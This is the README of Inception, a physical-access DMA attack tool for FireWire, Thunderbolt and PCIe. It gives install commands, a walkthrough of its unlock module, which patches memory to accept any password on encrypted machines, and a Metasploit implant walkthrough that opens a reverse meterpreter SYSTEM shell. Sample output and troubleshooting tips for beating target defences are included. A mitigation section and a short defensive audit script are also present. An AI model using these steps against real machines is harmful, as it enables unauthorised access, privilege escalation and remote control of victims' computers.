Inception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces.
Inception aims to provide a relatively quick, stable and easy way of performing intrusive and non-intrusive memory hacks against live computers using DMA.
Inception’s modules work as follows: by presenting a Serial Bus Protocol 2 (SBP-2) unit directory to the victim machine over the IEEE 1394 FireWire interface, the victim operating system thinks that an SBP-2 device has connected to the FireWire port. Since SBP-2 devices utilize Direct Memory Access (DMA) for fast, large bulk data transfers (e.g., FireWire hard drives and digital camcorders), the victim lowers its shields and enables DMA for the device. The tool now has full read/write access to the lower 4 GB of RAM on the victim.
Once DMA is granted, the tool proceeds to search through available memory pages for signatures at certain offsets in the operating system’s code. Once found, the tool manipulates this code. For instance, in the unlock module, the tool short circuits the operating system’s password authentication module that is triggered if an incorrect password is entered.
After running that module you should be able to log into the victim machine using any password.
An analogy for this operation is planting an idea into the memory of the machine; the idea that every password is correct. In other words, the equivalent of a memory inception.
The world’s forensics experts, governments and three-letter acronym agencies are using similar tools already, so why not? Inception is free, as in beer. A professional equivalent tool will set you back ~10 000 USD. Hack back!
- Version: 0.4.0
- License: GPL
- Author: Carsten Maartmann-Moe ([email protected]) AKA ntropy
- Twitter: @breaknenter
- Site: http://www.breaknenter.org/projects/inception
- Download / source: https://github.com/carmaa/inception
The tool makes use of the libforensic1394 library courtesy of Freddie Witherden under an LGPL license.
- Attacker machine: Linux or Mac OS X (host / attacker machine) with a FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port. Linux is currently recommended due to buggy FireWire interfaces on OS X.
- Victim machine: A FireWire or Thunderbolt interface, or an ExpressCard/PCMCIA expansion port
- Python 3
- gcc (incl. g++)
- pip (for automatic resolution of dependencies)
On Debian-based distributions the installation command lines can be summarized as:
sudo apt-get install git cmake g++ python3 python3-pip
On OS X, you can install the tool requirements with homebrew:
brew install git cmake python3
After installing the requirements, download and install libforensic1394:
git clone git://git.freddie.witherden.org/forensic1394.git
cd forensic1394
cmake CMakeLists.txt
sudo make install
cd python
sudo python3 setup.py install
Then download and install Inception itself:
git clone git://github.com/carmaa/inception.git
cd inception
./setup.py install
The setup script should be able to install dependencies if you have
- Connect the attacker machine (host) and the victim (target) with a FireWire cable
- Run Inception
incept [module name]
For a more complete and up-to-date description, please run:
or see the tool home page.
As of version 0.4.0, Inception has been modularized. The current modules and their functionality are described below.
For detailed options on usage, run:
incept [module name] -h
Note: Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-d, effectively blocking DMA requests and thwarting almost all modules. Look for vtd fault entries in your log/console.
The unlock module can unlock (any password accepted) and escalate privileges to Administrator/root on almost* any powered-on machine you have physical access to. The module is primarily intended to do its magic against computers that utilize full disk encryption such as BitLocker, FileVault, TrueCrypt or Pointsec. There are plenty of other (and better) ways to hack a machine that doesn’t pack encryption.
The unlock module is stable on machines that have 4 GiB of main memory or less. If the target has more than that, you need to be lucky in order to find the signatures mapped to a physical memory page frame that the tool can reach.
As of this version, it is able to unlock the following x86 and x64 operating systems:
| OS | Version | Unlock lock screen | Escalate privileges |
|---|---|---|---|
| Mac OS X | Mavericks | Yes (1) | Yes (1) |
| Mac OS X | Mountain Lion | Yes (2) | Yes (2) |
| Mac OS X | Lion | Yes (2) | Yes (2) |
| Mac OS X | Snow Leopard | Yes | Yes |
| Mac OS X | Leopard | | |
(1): Mavericks since 10.8.2 on Ivy Bridge (>= 2012 Macs) have enabled VT-d, effectively blocking DMA requests and thwarting this attack. Look for vtd fault entries in your log/console.
(2): If FileVault 2 is enabled, the tool will only work when the operating system is unlocked as of OS X Lion.
(2): Other Linux distributions that use PAM-based authentication may also work using the Ubuntu signatures.
The module also effectively enables escalation of privileges, for instance via commands such as sudo -s.
To unlock, simply type:
incept unlock
v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter
[?] Will potentially write to file. OK? [y/N] y
[*] Available targets (known signatures):
  Windows 8 MsvpPasswordValidate unlock/privilege escalation
  Windows 7 MsvpPasswordValidate unlock/privilege escalation
  Windows Vista MsvpPasswordValidate unlock/privilege escalation
  Windows XP MsvpPasswordValidate unlock/privilege escalation
  Mac OS X DirectoryService/OpenDirectory unlock/privilege escalation
  Ubuntu libpam unlock/privilege escalation
  Linux Mint libpam unlock/privilege escalation
[?] Please select target (or enter 'q' to quit): 2
[*] Selected target: Windows 7 MsvpPasswordValidate unlock/privilege escalation
[=============> ] 227 MiB ( 22%)
[*] Signature found at 0xe373312 in page no. 58227
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!
The implant module implants a (potentially memory-only) Metasploit payload directly into the volatile memory of the target machine. It integrates with MSF through the msfrpcd daemon that is included in all versions of Metasploit.
The current version only works as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request.
To use it, start
msfrpcd -P [password]
Then launch inception:
incept implant --msfpw [password] --msfopts [options]
As an example, to create a reverse TCP meterpreter shell from the target machine to your attacking host, first start the msfrpcd daemon, and then launch a console listening for callbacks:
msfrpcd -P password
msfconsole
In the console, we configure the receiving end of the payload. We’re setting the EXITFUNC option to thread to ensure that the target process stays alive if something should go awry:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.1
set EXITFUNC thread
set ExitOnSession false
exploit -j
Then, in another terminal, we launch Inception:
incept implant --msfpw password --msfopts LHOST=172.16.1.1
v.0.4.0 (C) Carsten Maartmann-Moe 2014
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter
[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request on github.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================> ] 537 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================> ] 434 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!
In your MSF console, you should see something similar to this:
msf exploit(handler) >
[*] Sending stage (769536 bytes) to 172.16.78.200
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 172.16.78.200:49178) at 2014-08-30 16:23:31 +0200

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-11FMQRBAMJ6  172.16.1.1:4444 -> 172.16.78.200:49178 (172.16.78.200)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Not working you say? Here’s a couple of hints:
- First, use the -v switch to visually confirm that the tool is able to read memory from the victim.
- Make sure you actually are connected with an IEEE 1394 FireWire cable (FireWire to USB converters, etc. won’t work, but 4/6/9 pin FireWire adapters do). Doh.
- “No FireWire devices detected on the bus”
- First, try running the tool again.
- If you get this error message, try a different cable and/or using a couple of converters to convert from a 6/9 pin FireWire connector to 4 pin and back again. 6/9 pin FireWire cables are capable of transferring power, and this may cause trouble for some FireWire chipsets. Some FireWire cables are also known to be “straight-through” (i.e., not “crossover”), and this is known to cause trouble.
- Are you attacking from an OS that doesn’t support hot-plugging (such as BackTrack) using an ExpressCard/etc. on the host side? Re-boot the machine with the expansion card plugged in before running Inception.
- Are you sure you’re getting DMA? Sometimes the target machine takes an extended period of time (I’ve experienced time-spans up to around 30 secs on slow targets) installing the FireWire drivers and lowering the DMA shield; it is possible that you just didn’t wait long enough before attacking. Use the delay switch to increase the delay, and -v/--verbose to see if you actually read data. Also, looking in the Device Manager (assuming you are setting up a demo attacking Windows) may be helpful to see that a FireWire SBP2 device actually pops up when running the tool. Mind you, it is all right with a yellow exclamation mark by the device; the tool should work nevertheless.
- Does your target use some form of endpoint protection? Some antivirus vendors specifically block FireWire DMA. Turn it off and see what happens.
- Does your FireWire port work? Try connecting a FireWire disk and see if it is recognized. Check your BIOS setting to see that it is not disabled. Ensure that FireWire drivers are present and not removed from the system.
- Are you getting data, but still can’t find the signature? Check the above and see the FAQ below. Also check the amount of RAM installed (FireWire max addressable memory space is 4 GiB). The code may lie above that threshold, in which case the unlock attack won’t work. This is especially true for Linux machines, where kernel code resides in high memory addresses.
- Did Inception patch successfully, but you cannot log in? Try a non-blank password. Some OS authentication mechanisms check for blank passwords before passing control to the mechanism that Inception patches.
- Try again. Sometimes the DMA shield fails to lower on the first try/tries.
- Due to severe bugs in the Mac OS X FireWire stack IOKit, attacking from a Mac can cause a kernel panic at the target and/or host system if an error condition should occur. As of March 2012, attacking from Mac OS X is not recommended.
- Inception may not work reliably against machines with more than 4 GiB RAM, as the signatures the tool looks for may be loaded at a memory address > 0xffffffff. You may still be able to exploit the target by dumping as much memory as possible and, say, searching for encryption keys.
- You may have trouble reading above 2 GiB on targets with more than 2 GiB RAM. This is due to the way the memory controller provisions physical addresses. Since there’s currently no way of detecting (over FireWire) how much physical memory the target has, the tool will continue to attempt to read memory up to the 4 GiB limit. You will see a noticeable slowdown in reading when the tool tries to read data from addresses that don’t map to hardware RAM.
- OS X Lion disables DMA when the user is logged out/screen is locked and FileVault is enabled. Attacking will only work while the user is logged in, or if user switching is enabled. The user switching trick only works for versions before 10.7.2, where the vulnerability is patched.
- If you have an OF/EFI firmware password set on the target Mac OS X, FireWire DMA is off by default.
To stay safe and protect against FireWire DMA attacks, here’s a couple of suggestions:
- Block the SBP-2 driver
- Remove FireWire drivers from your system if you don’t need to use FireWire
- Don’t panic – if you are using FileVault2 and OS X Lion (10.7.2) and higher, the OS will automatically turn off DMA when locked – you’re still vulnerable to attacks when unlocked, though
- Set a firmware password
- Disable DMA or remove the 1394 drivers (see the ‘Mitigation: Linux’ section)
All of the above will impact FireWire in one way or the other. Unfortunately, this is a FireWire design problem, not an OS problem, and would have to be fixed in the SBP-2 protocol itself.
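The following POSIX shell script is an added example, not part of the Inception project: it audits a Linux host for the FireWire/SBP-2 DMA exposure described on this page (loaded 1394 modules, whether an IOMMU is confining device DMA, and any logged IOMMU fault records, the Linux counterpart of the vtd fault entries mentioned above) and writes the modprobe.d fragment that implements “Block the SBP-2 driver”. The lsmod/dmesg text it checks is constructed sample input, not from a real host; the kernel log strings it greps for are the ones the intel-iommu and AMD-Vi drivers emit.

```shell
# Added example, not part of the Inception project: audit a Linux host for the
# FireWire/SBP-2 DMA exposure described above and emit the modprobe.d fragment
# for "Block the SBP-2 driver". Inputs are strings so checks run offline.
DMA_MODULES="firewire_sbp2 firewire_ohci sbp2 ohci1394"  # Juju + old 1394 stacks

# sbp2_exposed LSMOD_TEXT: prints loaded DMA-capable 1394 modules, 0 if any.
sbp2_exposed() {
    found=""
    for m in $DMA_MODULES; do
        printf '%s\n' "$1" | grep -q "^$m " && found="$found $m"
    done
    printf '%s' "${found# }"
    [ -n "$found" ]
}
# iommu_active DMESG_TEXT: 0 if the kernel reports an enabled VT-d/AMD-Vi IOMMU.
iommu_active() {
    printf '%s\n' "$1" | grep -Eq 'DMAR: IOMMU enabled|AMD-Vi: Found IOMMU'
}
# dma_faults DMESG_TEXT: count of IOMMU fault records, i.e. device DMA that was
# blocked (the Linux counterpart of the "vtd fault" entries mentioned above).
dma_faults() {
    printf '%s\n' "$1" | grep -Eic 'DMAR: .*fault addr|AMD-Vi: Event logged|vtd fault'
}
# assess LSMOD_TEXT DMESG_TEXT: one-line verdict.
assess() {
    mods=$(sbp2_exposed "$1") || { echo "no-1394"; return 0; }
    if iommu_active "$2"; then
        echo "mitigated (IOMMU on, loaded: $mods)"
    else
        echo "exposed (loaded: $mods)"
    fi
}
# write_blacklist FILE: modprobe.d fragment that keeps the drivers from loading.
write_blacklist() {
    {
        echo "# Disable FireWire DMA: block the 1394 host and SBP-2 drivers"
        for m in $DMA_MODULES; do
            name=$(printf '%s' "$m" | tr '_' '-')
            echo "blacklist $name"
            echo "install $name /bin/false"
        done
    } > "$1"
}
# Constructed sample output (not from a real host) for a stand-alone run.
SAMPLE_LSMOD="firewire_sbp2          20480  0
firewire_ohci          45056  0
firewire_core          69632  2 firewire_sbp2,firewire_ohci"
SAMPLE_DMESG="[    0.51] DMAR: IOMMU enabled
[  812.03] DMAR: [DMA Read] Request device [0b:00.0] fault addr 1e000000 [fault reason 06] PTE Read access is not set"
assess "$SAMPLE_LSMOD" "$SAMPLE_DMESG"; echo "IOMMU fault records: $(dma_faults "$SAMPLE_DMESG")"
```

On a live host, feed it `"$(lsmod)"` and `"$(dmesg)"` and install the fragment under /etc/modprobe.d/; a non-zero fault count while a 1394 device is attached is worth investigating.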
Inception was originally coded as a GPL replacement for winlockpwn, the Windows FireWire unlock tool made available by Adam Bolieu aka Metlstorm. winlockpwn was quite stable against older Windows XP targets, but did not perform well against more modern operating systems like Windows 7 (and it is not maintained anymore). As of Linux kernel 2.6.22, Linux distros ship with the new ‘Juju’ FireWire stack, making winlockpwn obsolete. Alas, Inception was born.
DMA attacks have been known for many years, so this is nothing new (except for the fact that I will reverse engineer new signatures and update the tool’s functionality until the problem is fixed). However, vendors generally dismiss DMA attacks as a non-issue, which I hope the awareness that this tool generates will change. Users deserve secure devices, even when attackers gain physical access.
- Q: This tool is irrelevant, I can just boot the machine with [insert live CD OS here], dump the SAM and SECURITY hives and crack the passwords.
A: No, you can’t if the target is a full disk encrypted machine. See above. This tool is designed to unlock powered on machines that utilize secure, full disk encryption. It is also far stealthier than the above attack.
- Q: Can’t I just use the screen_unlock.rb Metasploit script?
A: Well you can, assuming that you already have a shell at the target machine. If you have that, you probably won’t need this tool.
- Q: I use full disk encryption. Your tool is moot.
A: No, you’re missing the point: The tool is intended to be used against full disk encrypted machines. See FAQ 1.
- Q: This is FUD! I would never let anyone plug anything into my machine! I’m never more than an arm’s length from my computer. In fact, my machine is the only object I have a non-platonic relationship with, and I would never let my eyes off her. No one would go to the trouble of hacking a single machine anyway.
A: Good for you. The attack is dependent on physical access to a box in a powered on or standby state, so likely you’ll not be hacked. However, there are organizations out there that would go to utmost lengths to be able to access machines in seconds without leaving a trace. If you are not a target of these organizations, you’re likely never going to be hacked this way. However, if it is your job to be paranoid, you should know about this attack and make an informed decision to protect yourself.
- Q: I’ve just glued/desoldered all my Firewire ports. Your move, mhuddafuckah.
A: Ahem. See the answer to FAQ 7.
- Q: Wasn’t this fixed years ago? I remember hearing about this in the olden days (2004).
A: Sadly, no. And yes, the problem is old, but it is not entirely fixable with a driver update, a patch or a new OS version. The problem is in the FireWire specs. All OS vendors that want to include FireWire drivers that are OHCI compliant and work out of the box with SBP-2 devices are vulnerable to some degree.
- Q: Isn’t FireWire a dying horse? Few laptops ship with FireWire ports these days, which makes Inception a useless tool.
A: You can use any interface that expands the PCIe bus, for example PCMCIA, ExpressCards, the new Thunderbolt interface and perhaps SD/IO to hotplug a FireWire interface into the victim machine. The OS will install the necessary drivers on the fly, even when the machine is locked.
- Q: Your tool isn’t working.
A: That’s not a question. Check the troubleshooting section above first, and when you have made sure that the error source isn’t between the chair and the keyboard, preferably open an issue at github describing the problem, including:
- Your host OS
- The target OS (For Windows, the output of running winver.exe on the machine, format: major.minor.build, for Linux the output of uname -a and perhaps cat /etc/lsb-release)
- The target CPU architecture (x86/x64, etc.)
- Output of the tool
- Memory size of target
License / donate
If you like the tool, and especially if you use it successfully in a digital investigation, please consider making a donation to me:
My Bitcoin address